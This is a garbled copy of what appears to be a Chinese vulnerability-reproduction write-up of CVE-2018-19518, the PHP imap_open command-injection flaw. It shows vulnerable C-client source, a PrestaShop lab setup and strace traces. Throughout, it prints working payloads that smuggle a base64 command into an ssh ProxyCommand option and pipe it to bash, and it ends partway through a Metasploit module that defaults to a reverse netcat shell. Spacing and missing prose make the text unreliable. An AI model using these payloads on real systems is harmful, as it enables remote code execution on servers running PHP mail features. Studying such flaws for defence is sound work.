搜索

[13619] 2019-01-06_CVE-2018-19518:PHPimap_open函数任意命令执行漏洞复现

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2019-01-06_CVE-2018-19518:PHPimap_open函数任意命令执行漏洞复现 C V E - 2 0 1 8 - 1 9 5 1 8 P H P   i m a p _ o p e n     F r e e B u f   2 0 1 9 - 0 1 - 0 6 U b u n t u   h t t p s : / / p e o p l e . c a n o n i c a l . c o m / ~ u b u n t u - s e c u r i t y / c v e / 2 0 1 8 / C V E - 2 0 1 8 - 1 9 5 1 8 . h t m l D e b i a n   h t t p s : / / s e c u r i t y - t r a c k e r . d e b i a n . o r g / t r a c k e r / C V E - 2 0 1 8 - 1 9 5 1 8 R e d   H a t   h t t p s : / / a c c e s s . r e d h a t . c o m / s e c u r i t y / c v e / c v e - 2 0 1 8 - 1 9 5 1 8 S U S E   h t t p s : / / w w w . s u s e . c o m / s e c u r i t y / c v e / C V E - 2 0 1 8 - 1 9 5 1 8 / P H P   i m a p _ o p e n i m a p _ o p e n r s h s s h r s h s s h r s h s s h - o P r o x y C o m m a n d I M A P e x e c   s h e l l M e t a s p l o i t   F r a m e w o r k 访 访 D e b i a n 9 P H P p h p 7 . 0 . 3 0 P H P S S H s t r a c e a p t - g e t   u p d a t e   & &   a p t - g e t   i n s t a l l   - y   n a n o   p h p e c h o   ;   p r i o r i t y = 9 9   >   / e t c / p h p / 7 . 0 / m o d s - a v a i l a b l e / d i s a b l e f n s . i n i e c h o   d i s a b l e _ f u n c t i o n s = e x e c , p a s s t h r u , s h e l l _ e x e c , s y s t e m , p r o c _ o p e n , p o p e n , c u r l _ e x e c , c u r l _ m u l t i _ e x e c , p a r s e _ i n i _ f i l e , s h o w _ s o u r c e   > >   / e t c / p h p / 7 . 0 / m o d s - a v a i l a b l e / d i s a b l e f n s . i n i p h p e n m o d   d i s a b l e f n s a p t - g e t   i n s t a l l   - y   s s h a p t - g e t   i n s t a l l   - y   s t r a c e
I M A P I M A P I M A P I n t e r n e t 访 I M A P T C P   /   I P I n t e r n e t I M A P M a r k   C r i s p i n 1 9 8 6 广 使 P O P I M A P R F C   3 5 0 1 I M A P I M A P 1 4 3 . I M A P   o v e r   S S L I M A P S 9 9 3 P H P I M A P 使 P H P i m a p _ o p e n I M A P   S t r e a m P H P ;   U W   I M A P 7 2 0 1 1 I M A P P H P , 使 m a i l b o x I M A P 使 s s h r s h 使 使 使 t c p _ a o p e n t c p _ u n i x . c s s h r s h S S H P A T H R S H P A T H S S H P A T H / i m a p - 2 0 0 7 f / s r c / o s d e p / u n i x / e n v _ u n i x . h c d   / t m p / w g e t   h t t p : / / h t t p . d e b i a n . n e t / d e b i a n / p o o l / m a i n / u / u w - i m a p / u w - i m a p _ 2 0 0 7 f ~ d f s g - 2 . d s c w g e t   h t t p : / / h t t p . d e b i a n . n e t / d e b i a n / p o o l / m a i n / u / u w - i m a p / u w - i m a p _ 2 0 0 7 f ~ d f s g . o r i g . t a r . g z w g e t   h t t p : / / h t t p . d e b i a n . n e t / d e b i a n / p o o l / m a i n / u / u w - i m a p / u w - i m a p _ 2 0 0 7 f ~ d f s g - 2 . d e b i a n . t a r . g z a p t - g e t   i n s t a l l   d p k g - d e v d p k g - s o u r c e   - x   u w - i m a p _ 2 0 0 7 f ~ d f s g - 2 . d s c   i m a p - 2 0 0 7 f m v   i m a p - 2 0 0 7 f   / u s r / l o c a l / r e s o u r c e   i m a p _ o p e n   (   s t r i n g   $ m a i l b o x   ,   s t r i n g   $ u s e r n a m e   ,   s t r i n g   $ p a s s w o r d   [ ,   i n t   $ o p t i o n s   =   0   [ ,   i n t   $ n _ r e t r i e s   =   0   [ ,   a r r a y   $ p a r a m s   =   N U L L   ] ] ]   ) { [ h o s t ] } : [ p o r t ] [ f l a g s ] } [ m a i l b o x _ n a m e ] c d   / u s r / l o c a l / i m a p - 2 0 0 7 f / c a t   s r c / o s d e p / u n i x / t c p _ u n i x . c /   T C P / I P   a u t h e n t i c a t e d   o p e n     A c c e p t s :   h o s t   n a m e                       s e r v i c e   n a m e                       r e t u r n e d   u s e r   n a m e   b u f f e r     R e t u r n s :   T C P / I P   s t r e a m   i f   s u c c e s s   e l s e   N I L   / # d e f i n e   M A X A R G V   2 0 . . . T C P S T R E A M   t c p _ a o p e n   ( N E T M B X   m b , c h a r   s e r v i c e , c h a r   u s r b u f ) { # i f d e f   S S H P A T H                                     /   s s h   p a t h   d e f i n e d   y e t ?   /     i f   ( ! s s h p a t h )   s s h p a t h   =   c p y s t r   ( S S H P A T H ) ; # e n d i f # i f d e f   R S H P A T H                                     /   r s h   p a t h   d e f i n e d   y e t ?   /     i f   ( ! r s h p a t h )   r s h p a t h   =   c p y s t r   ( R S H P A T H ) ; # e n d i f /   d o r c ( )   o p t i o n s   / # d e f i n e   S Y S C O N F I G   " / e t c / c - c l i e n t . c f "
/ i m a p - 2 0 0 7 f / s r c / o s d e p / u n i x / e n v _ u n i x . c / e t c R S H P A T H M a k e f i l e M a k e f i l e M a k e f i l e / u s r / b i n / r s h M a k e f i l e / i m a p - 2 0 0 7 f / s r c / o s d e p / u n i x / M a k e f i l e : /   P r o c e s s   r c   f i l e     A c c e p t s :   f i l e   n a m e                       . m m i n i t   f l a g     D o n ' t   u s e   t h i s   f e a t u r e .   / v o i d   d o r c   ( c h a r   f i l e , l o n g   f l a g ) {     i n t   i ;     c h a r   s , t , k , r , t m p [ M A I L T M P L E N ] , t m p x [ M A I L T M P L E N ] ;     e x t e r n   M A I L S T R E A M   C R E A T E P R O T O ;     e x t e r n   M A I L S T R E A M   E M P T Y P R O T O ;     D R I V E R   d ;     F I L E   f ;     i f   ( ( f   =   f o p e n   ( f i l e   ?   f i l e   :   S Y S C O N F I G , " r " ) )   & &             ( s   =   f g e t s   ( t m p , M A I L T M P L E N , f ) )   & &   ( t   =   s t r c h r   ( s , ' n ' ) ) )   d o   {         t + +   =   ' 0 ' ;                                 /   t i e   o f f   l i n e ,   f i n d   s e c o n d   s p a c e   /         i f   ( ( k   =   s t r c h r   ( s , '   ' ) )   & &   ( k   =   s t r c h r   ( + + k , '   ' ) ) )   {             k + +   =   ' 0 ' ;                             /   t i e   o f f   t w o   w o r d s   /             i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   k e y w o r d s " )   & &   ! u s e r F l a g s [ 0 ] )   {                                                                 /   y e s ,   g e t   f i r s t   k e y w o r d   /                 k   =   s t r t o k _ r   ( k , " ,   " , & r ) ;                     f s _ g i v e   ( ( v o i d   )   & s h a r e d H o m e ) ;                     s h a r e d H o m e   =   c p y s t r   ( k ) ;                 }                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   s y s t e m - i n b o x " ) )   {                     f s _ g i v e   ( ( v o i d   )   & s y s I n b o x ) ;                     s y s I n b o x   =   c p y s t r   ( k ) ;                 }                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   m a i l - s u b d i r e c t o r y " ) )   {                     f s _ g i v e   ( ( v o i d   * )   & m a i l s u b d i r ) ;                     m a i l s u b d i r   =   c p y s t r   ( k ) ;                 }                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   f r o m - w i d g e t " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ F R O M W I D G E T ,                                                       c o m p a r e _ c s t r i n g   ( k , " h e a d e r - o n l y " )   ?                                                       V O I D T   :   N I L ) ; ^ L                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   r s h - c o m m a n d " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ R S H C O M M A N D , ( v o i d   )   k ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   r s h - p a t h " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ R S H P A T H , ( v o i d   )   k ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   s s h - c o m m a n d " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ S S H C O M M A N D , ( v o i d   )   k ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   s s h - p a t h " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ S S H P A T H , ( v o i d   )   k ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   t c p - o p e n - t i m e o u t " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ O P E N T I M E O U T , ( v o i d   )   a t o l   ( k ) ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   t c p - r e a d - t i m e o u t " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ R E A D T I M E O U T , ( v o i d   )   a t o l   ( k ) ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   t c p - w r i t e - t i m e o u t " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ W R I T E T I M E O U T , ( v o i d   )   a t o l   ( k ) ) ;                 e l s e   i f   ( ! c o m p a r e _ c s t r i n g   ( s , " s e t   r s h - t i m e o u t " ) )                     m a i l _ p a r a m e t e r s   ( N I L , S E T _ R S H T I M E O U T , ( v o i d   )   a t o l   ( k ) ) ; b s 3 :   #   B S D / i 3 8 6   3 . 0   o r   h i g h e r R S H P A T H = / u s r / b i n / r s h   b s f :   #   F r e e B S D R S H P A T H = / u s r / b i n / r s h   m n t :   #   M i n t R S H P A T H = / u s r / b i n / r s h   o s x :   #   M a c   O S   X R S H P A T H = / u s r / b i n / r s h   s l x :   #   S e c u r e   L i n u x R S H P A T H = / u s r / b i n / r s h  
c a t t c p _ a p p e n r i m a p d P H P t e s t 1 . p h p P o c 使 e x e c v e s t r a c e x P H P i m a p _ o p e n 使 $   I F S   s h e l l   t b a s h 使 C t r l   +   V T a b 使 b a s e 6 4 h a c k   b a r b a s e 6 4 f i r e f o x h a c k b a r c h r o m e h a c k b a r f i r e f o x h a c k b a r c h r o m e   # e n d i f     i f   ( s e r v i c e   = =   ' ' )   {                 /   w a n t   s s h ?   /                                                                 /   r e t u r n   i m m e d i a t e l y   i f   s s h   d i s a b l e d   /         i f   ( ! ( s s h p a t h   & &   ( t i   =   s s h t i m e o u t ) ) )   r e t u r n   N I L ;                                                                 /   s s h   c o m m a n d   p r o t o t y p e   d e f i n e d   y e t ?   /         i f   ( ! s s h c o m m a n d )   s s h c o m m a n d   =   c p y s t r   ( " % s   % s   - l   % s   e x e c   / u s r / s b i n / r % s d " ) ;     }                                                                 /   w a n t   r s h ?   /     e l s e   i f   ( r s h p a t h   & &   ( t i   =   r s h t i m e o u t ) )   {                                                                 /   r s h   c o m m a n d   p r o t o t y p e   d e f i n e d   y e t ?   /         i f   ( ! r s h c o m m a n d )   r s h c o m m a n d   =   c p y s t r   ( " % s   % s   - l   % s   e x e c   / u s r / s b i n / r % s d " ) ;     }     e l s e   r e t u r n   N I L ;                             /   r s h   d i s a b l e d   /                                                                 /   l o o k   l i k e   d o m a i n   l i t e r a l ?   * / / t m p / t e s t 0 0 0 1 $ s e r v e r   =   " x   - o P r o x y C o m m a n d = e c h o t Z W N o b y A n M T I z N D U 2 N z g 5 M C c + L 3 R t c C 9 0 Z X N 0 M D A w M Q o = | b a s e 6 4 t - d | s h } " ; i m a p _ o p e n ( ' { ' . $ s e r v e r . ' : 1 4 3 / i m a p } I N B O X ' ,   ' ' ,   ' ' )   o r   d i e ( " n n E r r o r :   " . i m a p _ l a s t _ e r r o r ( ) ) ; h t t p s : / / g i t h u b . c o m / B o 0 o M / P H P _ i m a p _ o p e n _ e x p l o i t / b l o b / m a s t e r / e x p l o i t . p h p s t r a c e   - f   - e   t r a c e = c l o n e ,   e x e c v e   p h p   t e s t 1 . p h p [ p i d   1 7 2 5 1 ]   e x e c v e ( " / u s r / b i n / r s h " ,   [ " / u s r / b i n / r s h " ,   " x " ,   " - o P r o x y C o m m a n d = e c h o t Z W N o b y A n M T I z " . . . ,   " - l " ,   " r o o t " ,   " e x e c " ,   " / u s r / s b i n / r i m a p d " ] ,   [ /   2 0   v a r s   / ]   s s h P r o x y C o m m a n d P r o x y C o m m a n d 使 s h e l l '   e x e c ' s h e l l P r o x y C o m m a n d T O K E N S     西 s s h d 8 s s h d   - i 使 H o s t N a m e n o n e   C h e c k H o s t I P n c 1 使   1 9 2 . 0 . 2 . 0 H T T P P r o x y C o m m a n d   /   u s r   /   b i n   /   n c   - X   c o n n e c t   - x   1 9 2 . 0 . 2 . 0 : 8 0 8 0 %   h p s s h   - o P r o x y C o m m a n d   = e c h o   h e l l o   |   t e e   /   t m p   /   e x e c u t e d l o c a l h o s t r o o t @ h a c k e r : / t m p #   s s h   - o P r o x y C o m m a n d = " e c h o   h e l l o | t e e   / t m p / e x e c u t e d "   l o c a l h o s t s s h _ e x c h a n g e _ i d e n t i f i c a t i o n :   C o n n e c t i o n   c l o s e d   b y   r e m o t e   h o s t r o o t @ h a c k e r : / t m p #   c a t   / t m p / e x e c u t e d h e l l o r o o t @ h a c k e r : / t m p # e c h o   " e c h o   h e l l o | t e e   / t m p / e x e c u t e d " | b a s e 6 4 e h c o   Z W N o b y B o Z W x s b 3 x 0 Z W U g L 3 R t c C 9 l e G V j d X R l Z A o = | b a s e 6 4   - d | b a s h r o o t @ h a c k e r : / t m p #   e c h o   Z W N o b y B o Z W x s b 3 x 0 Z W U g L 3 R t c C 9 l e G V j d X R l Z A o = | b a s e 6 4   - d | b a s h h e l l o r o o t @ h a c k e r : / t m p #
P H P   t e s t 2 . p h p 使 s t r a c e P H P d i s a b l e _ f u n c t i o n s P r e s t a S h o p , P r e s t a S h o p , p h p m y s q l c d   / v a r / w w w / h t m l 访 1 9 2 . 1 6 8 . 1 6 9 . 1 2 8 / i n s t a l l / i n d e x . p h p A d m i n C u s t o m e r T h r e a d s / p r e s t a s h o p - 1 . 7 . 4 . 4 / c o n t r o l l e r s / a d m i n / A d m i n C u s t o m e r T h r e a d s C o n t r o l l e r . p h p i m a p _ o p e n u r l p a y l a o d . p h p P r e s t a S h o p P H P L i n u x C V E - 2 0 1 8 - 1 9 5 1 8 < ? p h p $ p a y l o a d   =   e c h o   h e l l o | t e e   / t m p / e x e c u t e d ; $ e n c o d e d _ p a y l o a d   =   b a s e 6 4 _ e n c o d e ( $ p a y l o a d ) ; $ s e r v e r   =   a n y   - o   P r o x y C o m m a n d = e c h o t . $ e n c o d e d _ p a y l o a d . | b a s e 6 4 t - d | b a s h ; @ i m a p _ o p e n ( { . $ s e r v e r . } : 1 4 3 / i m a p } I N B O X ,   ,   ) ; r o o t @ h a c k e r : / t m p #   s t r a c e   - f   - e   t r a c e = c l o n e , e x e c v e   p h p   t e s t 2 . p h p e x e c v e ( " / u s r / b i n / p h p " ,   [ " p h p " ,   " t e s t 2 . p h p " ] ,   [ /   2 0   v a r s   / ] )   =   0 s t r a c e :   P r o c e s s   1 7 4 8 8   a t t a c h e d s t r a c e :   P r o c e s s   1 7 4 8 9   a t t a c h e d [ p i d   1 7 4 8 9 ]   e x e c v e ( " / u s r / b i n / r s h " ,   [ " / u s r / b i n / r s h " ,   " a n y " ,   " - o " ,   " P r o x y C o m m a n d = e c h o t Z W N o b y B o Z W x s b 3 " . . . ,   " - l " ,   " r o o t " ,   " e x e c " ,   " / u s r / s b i n / r i m a p d " ] ,   [ /   2 0   v a r s   / ]   < u n f i n i s h e d   . . . > [ p i d   1 7 4 8 8 ]   + + +   e x i t e d   w i t h   1   + + + [ p i d   1 7 4 8 7 ]   - - -   S I G C H L D   { s i _ s i g n o = S I G C H L D ,   s i _ c o d e = C L D _ E X I T E D ,   s i _ p i d = 1 7 4 8 8 ,   s i _ u i d = 0 ,   s i _ s t a t u s = 1 ,   s i _ u t i m e = 0 ,   s i _ s t i m e = 0 }   - - - [ p i d   1 7 4 8 9 ]   < . . .   e x e c v e   r e s u m e d >   )             =   0 [ p i d   1 7 4 8 9 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 8 4 a 6 8 4 2 6 5 0 )   =   1 7 4 9 0 s t r a c e :   P r o c e s s   1 7 4 9 0   a t t a c h e d [ p i d   1 7 4 9 0 ]   e x e c v e ( " / b i n / b a s h " ,   [ " / b i n / b a s h " ,   " - c " ,   " e x e c   e c h o t Z W N o b y B o Z W x s b 3 x 0 Z W U g L 3 " . . . ] ,   [ /   2 0   v a r s   / ] )   =   0 [ p i d   1 7 4 9 0 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 3 0 2 b 7 6 6 e 1 0 )   =   1 7 4 9 1 [ p i d   1 7 4 9 0 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 3 0 2 b 7 6 6 e 1 0 )   =   1 7 4 9 2 [ p i d   1 7 4 9 0 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 3 0 2 b 7 6 6 e 1 0 )   =   1 7 4 9 3 s t r a c e :   P r o c e s s   1 7 4 9 3   a t t a c h e d s t r a c e :   P r o c e s s   1 7 4 9 2   a t t a c h e d [ p i d   1 7 4 9 3 ]   e x e c v e ( " / b i n / b a s h " ,   [ " b a s h " ] ,   [ /   2 0   v a r s   / ] )   =   0 [ p i d   1 7 4 9 2 ]   e x e c v e ( " / u s r / b i n / b a s e 6 4 " ,   [ " b a s e 6 4 " ,   " - d " ] ,   [ /   2 0   v a r s   / ] s t r a c e :   P r o c e s s   1 7 4 9 1   a t t a c h e d )   =   0 [ p i d   1 7 4 9 1 ]   e x e c v e ( " / b i n / e c h o " ,   [ " e c h o " ,   " Z W N o b y B o Z W x s b 3 x 0 Z W U g L 3 R t c C 9 l e G V j " . . . ] ,   [ /   2 0   v a r s   / ] )   =   0 [ p i d   1 7 4 9 2 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 9 1 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 9 3 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 2 9 2 e 1 3 7 e 1 0 )   =   1 7 4 9 4 [ p i d   1 7 4 9 3 ]   c l o n e ( c h i l d _ s t a c k = N U L L ,   f l a g s = C L O N E _ C H I L D _ C L E A R T I D | C L O N E _ C H I L D _ S E T T I D | S I G C H L D ,   c h i l d _ t i d p t r = 0 x 7 f 2 9 2 e 1 3 7 e 1 0 )   =   1 7 4 9 5 s t r a c e :   P r o c e s s   1 7 4 9 5   a t t a c h e d [ p i d   1 7 4 9 5 ]   e x e c v e ( " / u s r / b i n / t e e " ,   [ " t e e " ,   " / t m p / e x e c u t e d " ] ,   [ /   2 0   v a r s   / ] )   =   0 s t r a c e :   P r o c e s s   1 7 4 9 4   a t t a c h e d [ p i d   1 7 4 9 4 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 9 5 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 9 3 ]   - - -   S I G C H L D   { s i _ s i g n o = S I G C H L D ,   s i _ c o d e = C L D _ E X I T E D ,   s i _ p i d = 1 7 4 9 4 ,   s i _ u i d = 0 ,   s i _ s t a t u s = 0 ,   s i _ u t i m e = 0 ,   s i _ s t i m e = 0 }   - - - [ p i d   1 7 4 9 3 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 9 0 ]   - - -   S I G C H L D   { s i _ s i g n o = S I G C H L D ,   s i _ c o d e = C L D _ E X I T E D ,   s i _ p i d = 1 7 4 9 2 ,   s i _ u i d = 0 ,   s i _ s t a t u s = 0 ,   s i _ u t i m e = 0 ,   s i _ s t i m e = 0 }   - - - [ p i d   1 7 4 9 0 ]   + + +   e x i t e d   w i t h   0   + + + [ p i d   1 7 4 8 9 ]   - - -   S I G C H L D   { s i _ s i g n o = S I G C H L D ,   s i _ c o d e = C L D _ E X I T E D ,   s i _ p i d = 1 7 4 9 0 ,   s i _ u i d = 0 ,   s i _ s t a t u s = 0 ,   s i _ u t i m e = 0 ,   s i _ s t i m e = 0 }   - - - [ p i d   1 7 4 8 9 ]   + + +   e x i t e d   w i t h   2 5 5   + + + P H P   N o t i c e :     U n k n o w n :   N o   s u c h   h o s t   a s   a n y   - o   P r o x y C o m m a n d = e c h o   Z W N o b y B o Z W x s b 3 x 0 Z W U g L 3 R t c C 9 l e G V j d X R l Z A = = | b a s e 6 4   - d | b a s h   ( e r r f l g = 2 )   i n   U n k n o w n   o n   l i n e   0 + + +   e x i t e d   w i t h   0   + + + r o o t @ h a c k e r : / t m p # a p t   i n s t a l l   - y   w g e t   u n z i p   a p a c h e 2   m y s q l - s e r v e r   p h p - z i p   p h p - c u r l   p h p - m y s q l   p h p - g d   p h p - m b s t r i n g s e r v i c e   m y s q l   s t a r t m y s q l   - u   r o o t   - e   " C R E A T E   D A T A B A S E   p r e s t a s h o p ;   G R A N T   A L L   P R I V I L E G E S   O N   .   T O   ' r o o t ' @ ' l o c a l h o s t '   I D E N T I F I E D   B Y   ' m e g a p a s s ' ; " a 2 e n m o d   r e w r i t e w g e t   [ h t t p s : / / d o w n l o a d . p r e s t a s h o p . c o m / d o w n l o a d / r e l e a s e s / p r e s t a s h o p _ 1 . 7 . 4 . 4 . z i p ] ( h t t p s : / / d o w n l o a d . p r e s t a s h o p . c o m / d o w n l o a d / r e l e a s e s / p r e s t a s h o p _ 1 . 7 . 4 . 4 . z i p ) u n z i p   p r e s t a s h o p _ 1 . 7 . 4 . 4 . z i p # S t a r t   A p a c h e 2   d a e m o n   a n d   s u r f   y o u r   w e b - s e r v e r   t o   b e g i n   s h o p   i n s t a l l a t i o n . s e r v i c e   a p a c h e 2   s t a r t / /   E x e c u t e s   t h e   I M A P   s y n c h r o n i z a t i o n . $ s y n c _ e r r o r s   =   $ t h i s - > s y n c I m a p ( ) ; p u b l i c   f u n c t i o n   s y n c I m a p ( ) { i f   ( ! ( $ u r l   =   C o n f i g u r a t i o n : : g e t ( P S _ S A V _ I M A P _ U R L ) ) | |   ! ( $ p o r t   =   C o n f i g u r a t i o n : : g e t ( P S _ S A V _ I M A P _ P O R T ) ) | |   ! ( $ u s e r   =   C o n f i g u r a t i o n : : g e t ( P S _ S A V _ I M A P _ U S E R ) ) | |   ! ( $ p a s s w o r d   =   C o n f i g u r a t i o n : : g e t ( P S _ S A V _ I M A P _ P W D ) ) )   { r e t u r n   a r r a y ( h a s E r r o r   = >   t r u e ,   e r r o r s   = >   a r r a y ( I M A P   c o n f i g u r a t i o n   i s   n o t   c o r r e c t ) ) ; } $ c o n f   =   C o n f i g u r a t i o n : : g e t M u l t i p l e ( a r r a y ( P S _ S A V _ I M A P _ O P T _ P O P 3 ,   P S _ S A V _ I M A P _ O P T _ N O R S H ,   P S _ S A V _ I M A P _ O P T _ S S L , P S _ S A V _ I M A P _ O P T _ V A L I D A T E - C E R T ,   P S _ S A V _ I M A P _ O P T _ N O V A L I D A T E - C E R T , P S _ S A V _ I M A P _ O P T _ T L S ,   P S _ S A V _ I M A P _ O P T _ N O T L S ) ) ; $ m b o x   =   @ i m a p _ o p e n ( { . $ u r l . : . $ p o r t . $ c o n f _ s t r . } ,   $ u s e r ,   $ p a s s w o r d ) ; < p h p   $   p a y l o a d   =   $   a r g v   [ 1 ] ;   $   e n c o d e d _ p a y l o a d   =   b a s e 6 4 _ e n c o d e $   p a y l o a d ;   $   s e r v e r   = a n y   - o   P r o x y C o m m a n d   =   e c h o     t $   e n c o d e d _ p a y l o a d |   b a s e 6 4     t d   |   b a s h } ;   p r i n t p a y l o a d { $   s e r v e r } P H P _ E O L ; 访 使 I P 访 A C L 访 使 # # #   T h i s   m o d u l e   r e q u i r e s   M e t a s p l o i t :   h t t p s : / / m e t a s p l o i t . c o m / d o w n l o a d #   C u r r e n t   s o u r c e :   h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k # # c l a s s   M e t a s p l o i t M o d u l e   <   M s f : : E x p l o i t : : R e m o t e     R a n k   =   G o o d R a n k i n g     i n c l u d e   M s f : : E x p l o i t : : R e m o t e : : H t t p C l i e n t     d e f   i n i t i a l i z e ( i n f o   =   { } )         s u p e r ( u p d a t e _ i n f o ( i n f o ,             ' N a m e '                         = >   ' p h p   i m a p _ o p e n   R e m o t e   C o d e   E x e c u t i o n ' ,             ' D e s c r i p t i o n '           = >   % q {                 T h e   i m a p _ o p e n   f u n c t i o n   w i t h i n   p h p ,   i f   c a l l e d   w i t h o u t   t h e   / n o r s h   f l a g ,   w i l l   a t t e m p t   t o   p r e a u t h e n t i c a t e   a n                 I M A P   s e s s i o n .     O n   D e b i a n   b a s e d   s y s t e m s ,   i n c l u d i n g   U b u n t u ,   r s h   i s   m a p p e d   t o   t h e   s s h   b i n a r y .     S s h ' s   P r o x y C o m m a n d                 o p t i o n   c a n   b e   p a s s e d   f r o m   i m a p _ o p e n   t o   e x e c u t e   a r b i t r a r y   c o m m a n d s .                 W h i l e   m a n y   c u s t o m   a p p l i c a t i o n s   m a y   u s e   i m a p _ o p e n ,   t h i s   e x p l o i t   w o r k s   a g a i n s t   t h e   f o l l o w i n g   a p p l i c a t i o n s :                 e 1 0 7   v 2 ,   p r e s t a s h o p ,   S u i t e C R M ,   a s   w e l l   a s   C u s t o m ,   w h i c h   s i m p l y   p r i n t s   t h e   e x p l o i t   s t r i n g s   f o r   u s e .                 P r e s t a s h o p   e x p l o i t a t i o n   r e q u i r e s   t h e   a d m i n   U R I ,   a n d   a d m i n i s t r a t o r   c r e d e n t i a l s .                 s u i t e C R M / e 1 0 7 / h o s t c m s   r e q u i r e   a d m i n i s t r a t o r   c r e d e n t i a l s .             } ,             ' A u t h o r '   = >                 [                     ' A n t o n   L o p a n i t s y n ' ,   #   V u l n e r a b i l i t y   d i s c o v e r y   a n d   P o C                     ' T w o s t e r ' ,   #   V u l n e r a b i l i t y   d i s c o v e r y   a n d   P o C                     ' h 0 0 d i e '   #   M e t a s p l o i t   M o d u l e
                    ' h 0 0 d i e '   #   M e t a s p l o i t   M o d u l e                 ] ,             ' L i c e n s e '                   = >   M S F _ L I C E N S E ,             ' R e f e r e n c e s '             = >                 [                     [   ' U R L ' ,   ' h t t p s : / / w e b . a r c h i v e . o r g / w e b / 2 0 1 8 1 1 1 8 2 1 3 5 3 6 / h t t p s : / / a n t i c h a t . c o m / t h r e a d s / 4 6 3 3 9 5 '   ] ,                     [   ' U R L ' ,   ' h t t p s : / / g i t h u b . c o m / B o 0 o M / P H P _ i m a p _ o p e n _ e x p l o i t '   ] ,                     [   ' E D B ' ,   ' 4 5 8 6 5 ' ] ,                     [   ' U R L ' ,   ' h t t p s : / / b u g s . p h p . n e t / b u g . p h p ? i d = 7 6 4 2 8 ' ] ,                     [   ' C V E ' ,   ' 2 0 1 8 - 1 9 5 1 8 ' ]                 ] ,             ' P r i v i l e g e d '     = >   f a l s e ,             ' P l a t f o r m '     = >   [   ' u n i x '   ] ,             ' A r c h '     = >   A R C H _ C M D ,             ' T a r g e t s '   = >                 [                     [   ' p r e s t a s h o p ' ,   { }   ] ,                     [   ' s u i t e c r m ' ,   { } ] ,                     [   ' e 1 0 7 v 2 ' ,   { ' W f s D e l a y '   = >   9 0 } ] ,   #   m a y   n e e d   t o   w a i t   f o r   c r o n                     [   ' c u s t o m ' ,   { ' W f s D e l a y '   = >   3 0 0 } ]                 ] ,             ' P r e p e n d F o r k '   = >   t r u e ,             ' D e f a u l t O p t i o n s '   = >                 {                     ' P A Y L O A D '   = >   ' c m d / u n i x / r e v e r s e _ n e t c a t ' ,                     ' W f s D e l a y '   = >   1 2 0                 } ,             ' D e f a u l t T a r g e t '     = >   0 ,             ' D i s c l o s u r e D a t e '   = >   ' O c t   2 3   2 0 1 8 ' ) )         r e g i s t e r _ o p t i o n s (             [                 O p t S t r i n g . n e w ( ' T A R G E T U R I ' ,   [   t r u e ,   " B a s e   d i r e c t o r y   p a t h " ,   ' / a d m i n 2 7 6 9 g x 8 k 3 ' ] ) ,                 O p t S t r i n g . n e w ( ' U S E R N A M E ' ,   [   f a l s e ,   " U s e r n a m e   t o   a u t h e n t i c a t e   w i t h " ,   ' ' ] ) ,                 O p t S t r i n g . n e w ( ' P A S S W O R D ' ,   [   f a l s e ,   " P a s s w o r d   t o   a u t h e n t i c a t e   w i t h " ,   ' ' ] )             ] )     e n d     d e f   c h e c k       i f   t a r g e t . n a m e   = ~   / p r e s t a s h o p /             u r i   =   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h )             r e s   =   s e n d _ r e q u e s t _ c g i ( { ' u r i '   = >   u r i } )             i f   r e s   & &   ( r e s . c o d e   = =   3 0 1   | |   r e s . c o d e   = =   3 0 2 )               r e t u r n   C h e c k C o d e : : D e t e c t e d             e n d         e l s i f   t a r g e t . n a m e   = ~   / s u i t e c r m /             # l o g i n   p a g e   G E T   / i n d e x . p h p ? a c t i o n = L o g i n & m o d u l e = U s e r s             v p r i n t _ s t a t u s ( ' L o a d i n g   l o g i n   p 